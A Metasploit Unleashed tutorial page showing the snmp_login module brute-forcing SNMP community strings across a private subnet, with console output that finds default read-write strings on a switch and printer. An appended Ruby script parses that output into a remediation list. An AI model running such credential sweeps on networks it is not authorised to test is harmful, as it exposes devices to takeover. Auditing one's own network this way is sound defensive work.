auxiliary/scanner/snmp/snmp_login

From Metasploit Unleashed - Mastering The Framework

The snmp_login scanner is a module that scans a range of IP addresses to determine the community string for SNMP-enabled devices.

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > show options

Module options:

   Name              Current Setting                                             Required  Description
   ----              ---------------                                             --------  -----------
   BATCHSIZE         256                                                         yes       The number of hosts to probe in each set
   BLANK_PASSWORDS   true                                                        yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                           yes       How fast to bruteforce, from 0 to 5
   CHOST                                                                         no        The local client address
   PASSWORD                                                                      no        The password to test
   PASS_FILE         /opt/metasploit3/msf3/data/wordlists/snmp_default_pass.txt  no        File containing communities, one per line
   RHOSTS                                                                        yes       The target address range or CIDR identifier
   RPORT             161                                                         yes       The target port
   STOP_ON_SUCCESS   false                                                       yes       Stop guessing when a credential works for a host
   THREADS           1                                                           yes       The number of concurrent threads
   USERNAME                                                                      no        A specific username to authenticate as
   USERPASS_FILE                                                                 no        File containing users and passwords separated by space, one pair per line
   USER_FILE                                                                     no        File containing usernames, one per line
   VERBOSE           true                                                        yes       Whether to print output for all attempts

We set our RHOSTS and THREADS values while using the default wordlist and let the scanner run.

msf auxiliary(snmp_login) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(snmp_login) > set THREADS 254
THREADS => 254
msf auxiliary(snmp_login) > run

[+] SNMP: 192.168.1.2 community string: 'public' info: 'GSM7224 L2 Managed Gigabit Switch'
[+] SNMP: 192.168.1.199 community string: 'public' info: 'HP ETHERNET MULTI-ENVIRONMENT'
[+] SNMP: 192.168.1.2 community string: 'private' info: 'GSM7224 L2 Managed Gigabit Switch'
[+] SNMP: 192.168.1.199 community string: 'private' info: 'HP ETHERNET MULTI-ENVIRONMENT'
[*] Validating scan results from 2 hosts...
[*] Host 192.168.1.199 provides READ-WRITE access with community 'internal'
[*] Host 192.168.1.199 provides READ-WRITE access with community 'private'
[*] Host 192.168.1.199 provides READ-WRITE access with community 'public'
[*] Host 192.168.1.2 provides READ-WRITE access with community 'private'
[*] Host 192.168.1.2 provides READ-ONLY access with community 'public'
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(snmp_login) >

Our quick SNMP sweep found both the default public and private community strings on 2 devices on our network. This module can also be a useful tool for network administrators to identify attached devices that are insecurely configured.
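For administrators using the scan as a configuration audit, the following added example (not part of the original page or of Metasploit itself) parses saved snmp_login console output into a per-host list of community strings and flags those that grant READ-WRITE access. The function names, the SAMPLE constant and the 'UNVALIDATED' label are assumptions made for this illustration; the sample lines are copied from the output above.

```ruby
# Added example: turn snmp_login console output into a remediation list.
# SAMPLE is copied from the scan output shown on this page.
SAMPLE = <<~LOG
  [+] SNMP: 192.168.1.2 community string: 'public' info: 'GSM7224 L2 Managed Gigabit Switch'
  [+] SNMP: 192.168.1.199 community string: 'public' info: 'HP ETHERNET MULTI-ENVIRONMENT'
  [+] SNMP: 192.168.1.2 community string: 'private' info: 'GSM7224 L2 Managed Gigabit Switch'
  [+] SNMP: 192.168.1.199 community string: 'private' info: 'HP ETHERNET MULTI-ENVIRONMENT'
  [*] Validating scan results from 2 hosts...
  [*] Host 192.168.1.199 provides READ-WRITE access with community 'internal'
  [*] Host 192.168.1.199 provides READ-WRITE access with community 'private'
  [*] Host 192.168.1.199 provides READ-WRITE access with community 'public'
  [*] Host 192.168.1.2 provides READ-WRITE access with community 'private'
  [*] Host 192.168.1.2 provides READ-ONLY access with community 'public'
LOG

LOGIN_RE  = /^\[\+\] SNMP: (\S+) community string: '([^']*)' info: '(.*)'\s*$/
ACCESS_RE = /^\[\*\] Host (\S+) provides (READ-WRITE|READ-ONLY) access with community '([^']*)'\s*$/

# Returns { host => { info: String or nil, communities: { name => access } } }.
# A community seen only on a [+] line keeps the hypothetical label 'UNVALIDATED'.
def parse_snmp_login(text)
  hosts = Hash.new { |h, k| h[k] = { info: nil, communities: {} } }
  text.each_line do |line|
    if (m = LOGIN_RE.match(line))
      host = hosts[m[1]]
      host[:info] ||= m[3]
      host[:communities][m[2]] ||= 'UNVALIDATED'
    elsif (m = ACCESS_RE.match(line))
      # The validation line is authoritative for the access level.
      hosts[m[1]][:communities][m[3]] = m[2]
    end
  end
  hosts
end

# [host, community, device info] for every string that allows SNMP writes.
def writable_findings(hosts)
  hosts.flat_map do |ip, h|
    h[:communities].select { |_, access| access == 'READ-WRITE' }
                   .keys.sort.map { |community| [ip, community, h[:info]] }
  end.sort
end

if __FILE__ == $PROGRAM_NAME
  writable_findings(parse_snmp_login(SAMPLE)).each do |ip, community, info|
    puts "#{ip}\t#{community}\tREAD-WRITE\t#{info}"
  end
end
```

Each row in the result is a device whose community string should be changed or whose write access should be disabled.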
